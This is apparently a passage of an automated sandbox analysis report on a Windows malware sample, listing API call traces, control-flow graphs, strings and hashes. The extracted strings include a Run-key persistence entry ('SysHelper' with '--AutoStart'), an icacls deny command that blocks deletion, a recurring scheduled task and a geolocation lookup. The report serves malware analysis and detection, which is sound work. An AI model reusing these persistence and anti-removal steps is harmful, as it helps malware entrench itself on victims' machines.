                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                • API String ID: 2496729271-1738591096
                                • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 924 40d037 922->924 924->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 944 40d0cd-40d0e1 call 414300 935->944 945 40d0bf-40d0ca call 422587 935->945 941 40d093-40d09b call 422587 936->941 942 40d09e-40d0b4 call 413d40 936->942 938->912 939->938 941->942 942->935 944->928 954 40d0e7-40d149 call 413010 944->954 945->944 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 968 40d1a0 965->968 966->965 967 40d191-40d198 966->967 967->965 969 40d1c7-40d1c9 967->969 970 40d1a2-40d1a6 968->970 969->970 971 40d1b3-40d1c5 970->971 972 40d1a8-40d1b0 call 422587 970->972 971->931 972->971
                                APIs
                                • _memset.LIBCMT ref: 0040CF4A
                                • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                Strings
                                • "country_code":", xrefs: 0040CFE1
                                • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                • Microsoft Internet Explorer, xrefs: 0040CF5A
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead_memset
                                • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                • API String ID: 1485416377-2962370585
                                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 622 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->622 623 411e89-411e91 call 422587 621->623 633 411f36-411f38 622->633 634 411f3a-411f3f 622->634 623->622 631 411e3c-411e50 PathFileExistsW 629->631 632 411e2e-411e39 call 422587 629->632 635 411e00-411e08 call 422587 630->635 636 411e0b-411e23 call 4145a0 630->636 631->621 642 411e52-411e57 631->642 632->631 640 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->640 641 411f40-411f49 634->641 635->636 636->629 653 411f98-411fa0 640->653 654 411fce-411fe9 640->654 641->641 645 411f4b-411f4d 641->645 646 411e59-411e5e 642->646 647 411e6a-411e6e 642->647 645->640 646->647 649 411e60-411e65 call 414690 646->649 647->610 651 411e74-411e77 647->651 649->647 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 662 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->662 663 412000-412009 657->663 664 411fbf-411fc9 call 415c10 658->664 661 411fb0-411fb9 659->661 661->661 666 411fbb-411fbd 661->666 671 4121d1-4121d5 662->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 662->672 663->663 668 41200b-41200d 663->668 664->654 666->664 668->662 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                                APIs
                                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                • _memset.LIBCMT ref: 00411D3B
                                • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                • GetCommandLineW.KERNEL32 ref: 00411EB4
                                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                • UuidCreate.RPCRT4(?), ref: 00411EFC
                                • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                • DeleteFileW.KERNEL32(?), ref: 00412036
                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                • _memset.LIBCMT ref: 00412090
                                • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                • lstrlenW.KERNEL32(?), ref: 004120D7
                                • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                • _memset.LIBCMT ref: 00412120
                                • SetLastError.KERNEL32(00000000), ref: 00412146
                                • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                • API String ID: 2589766509-1182136429
                                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

                                Control-flow Graph

                                APIs
                                • GetCommandLineW.KERNEL32 ref: 00412235
                                • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                • CloseHandle.KERNEL32(00000000), ref: 00412347
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                • API String ID: 3668891214-3807497772
                                • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 986 4235a0 976->986 977->976 982 4235c0-4235c3 977->982 984 4235d7-4235dd 982->984 985 4235c5 982->985 989 4235e9 call 42fb64 984->989 990 4235df 984->990 987 4235c7-4235c9 985->987 988 4235cb-4235d5 call 425208 985->988 991 4235a2-4235a8 986->991 987->984 987->988 988->986 996 4235ee-4235fa call 42f803 989->996 990->988 993 4235e1-4235e7 990->993 993->988 993->989 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->991 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->991 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->991 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->991 1038 42368f-423696 1033->1038 1038->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                                APIs
                                • _memset.LIBCMT ref: 004235B1
                                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                • __gmtime64_s.LIBCMT ref: 0042364A
                                • __gmtime64_s.LIBCMT ref: 00423680
                                • __gmtime64_s.LIBCMT ref: 0042369D
                                • __allrem.LIBCMT ref: 004236F3
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                • __allrem.LIBCMT ref: 00423726
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                • __allrem.LIBCMT ref: 0042375B
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                • String ID:
                                • API String ID: 1503770280-0
                                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1060 427b0b-427b1a call 427ad7 ExitProcess
                                APIs
                                • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                  • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                  • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                • ExitProcess.KERNEL32 ref: 00427B1A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                • String ID: i;B
                                • API String ID: 2427264223-472376889
                                • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                                • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                                • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1063 42fb64-42fb77 call 428520 1066 42fba5-42fbaa call 428565 1063->1066 1067 42fb79-42fb8c call 428af7 1063->1067 1072 42fb99-42fba0 call 42fbab 1067->1072 1073 42fb8e call 42fe47 1067->1073 1072->1066 1076 42fb93 1073->1076 1076->1072
                                APIs
                                • __lock.LIBCMT ref: 0042FB7B
                                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                • __tzset_nolock.LIBCMT ref: 0042FB8E
                                  • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                  • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                  • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                  • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                  • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                  • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                • String ID:
                                • API String ID: 1282695788-0
                                • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1077 427f3d-427f47 call 427e0e 1079 427f4c-427f50 1077->1079
                                APIs
                                • _doexit.LIBCMT ref: 00427F47
                                  • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Pointer$Decode$Encode$__lock_doexit
                                • String ID:
                                • API String ID: 2158581194-0
                                • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                APIs
                                • GetVersionExA.KERNEL32(00000094), ref: 00481983
                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                                • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                                • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                                • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                                • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                                • FreeLibrary.KERNEL32(?), ref: 00481AC5
                                • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                                • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                                • FreeLibrary.KERNEL32(?), ref: 00481C15
                                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                                • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                                • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                                • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                                • FreeLibrary.KERNEL32(?), ref: 00481D45
                                • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                                • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                                • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                                • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                                • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                                • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                                • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                                • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                                • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                                • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                                • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                                • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                                • GetTickCount.KERNEL32 ref: 00481F03
                                • GetTickCount.KERNEL32 ref: 00481FF1
                                • GetTickCount.KERNEL32 ref: 00482066
                                • GetTickCount.KERNEL32 ref: 00482095
                                • GetTickCount.KERNEL32 ref: 004820FB
                                • GetTickCount.KERNEL32 ref: 00482118
                                • GetTickCount.KERNEL32 ref: 00482187
                                • GetTickCount.KERNEL32 ref: 004821A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$CountTick$Library$Load$Free$Version
                                • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                • API String ID: 842291066-1723836103
                                • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                                • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
                                APIs
                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                • __CxxThrowException@8.LIBCMT ref: 00411026
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                • __CxxThrowException@8.LIBCMT ref: 00411051
                                • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                • __CxxThrowException@8.LIBCMT ref: 0041107A
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                • __CxxThrowException@8.LIBCMT ref: 004110AB
                                • _memset.LIBCMT ref: 004110CA
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                • __CxxThrowException@8.LIBCMT ref: 004110F0
                                • _malloc.LIBCMT ref: 00411100
                                • _memset.LIBCMT ref: 0041110B
                                • _sprintf.LIBCMT ref: 0041112E
                                • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
